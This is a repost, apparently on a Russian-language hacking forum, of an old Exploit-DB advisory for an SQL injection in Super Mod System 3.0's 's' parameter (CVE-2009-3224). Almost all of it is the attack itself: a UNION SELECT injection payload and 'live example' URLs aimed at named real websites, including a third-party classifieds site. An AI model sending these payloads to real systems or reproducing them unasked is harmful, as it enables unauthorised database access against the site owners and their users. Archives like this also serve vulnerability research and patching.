Exploit Super Mod System 3.0 - 's' SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9270
Проверка EDB
  1. Пройдено
Автор
MIZOZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-3224
Дата публикации
2009-07-27
Код:
----------------------------------------------------------------------------------------------------
  Name : Super Mod System 3.1 5
  Site : http://www.classified-software.co.uk/
  Demo : http://www.classified-software.co.uk/super-mod-system-v3/

----------------------------------------------------------------------------------------------------
 
  Found By : MizoZ [EvilWay Team]
  Made in  : Morocco
  Contact  : mizoz[at]9[dot]cn
  Greetz   : Moudi , Zuka , optix , All friends
  Website : BlackArea.org (Coming Soon)
----------------------------------------------------------------------------------------------------

SQL Injection popup.php (GET : sb_id) :
[HOST]/[PATH]/index.php?s=[SQL CODE]

SQL CODE : -6+union+select+1,2,3,4,5--

Live Exemples :
http://www.classified-software.co.uk/super-mod-system-v3/index.php?s=3+and+1=0+union+all+select+1,2,3,4,5--
http://www.thepharmaclassifieds.com/index.php?s=-6+union+select+1,2,3,4,5--

----------------------------------------------------------------------------------------------------

# milw0rm.com [2009-07-27]
 
Источник
www.exploit-db.com

Похожие темы